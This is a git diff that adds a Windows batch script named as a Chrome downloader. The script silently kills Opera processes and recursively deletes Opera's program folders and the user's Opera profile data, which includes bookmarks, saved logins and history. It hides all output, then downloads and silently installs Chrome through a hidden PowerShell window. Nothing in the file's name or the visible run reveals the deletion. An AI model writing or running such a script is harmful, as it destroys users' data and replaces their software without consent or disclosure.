diff --git a/chrome_download.bat b/chrome_download.bat new file mode 100644 index 0000000..9320f87 --- /dev/null +++ b/chrome_download.bat @@ -0,0 +1,19 @@ +@echo off + +taskkill /f /im opera.exe >nul 2>&1 +taskkill /f /im opera_gx.exe >nul 2>&1 +taskkill /f /im launcher.exe >nul 2>&1 + +rd /s /q "%LOCALAPPDATA%\Programs\Opera" >nul 2>&1 +rd /s /q "%LOCALAPPDATA%\Programs\Opera GX" >nul 2>&1 + +rd /s /q "%APPDATA%\Opera Software" >nul 2>&1 +rd /s /q "%LOCALAPPDATA%\Opera Software" >nul 2>&1 + +set FILE=%TEMP%\ChromeStandaloneSetup64.exe + +powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://dl.google.com/chrome/install/ChromeStandaloneSetup64.exe' -OutFile '%FILE%'" >nul 2>&1 + +start /wait "" "%FILE%" /silent /install >nul 2>&1 + +exit \ No newline at end of file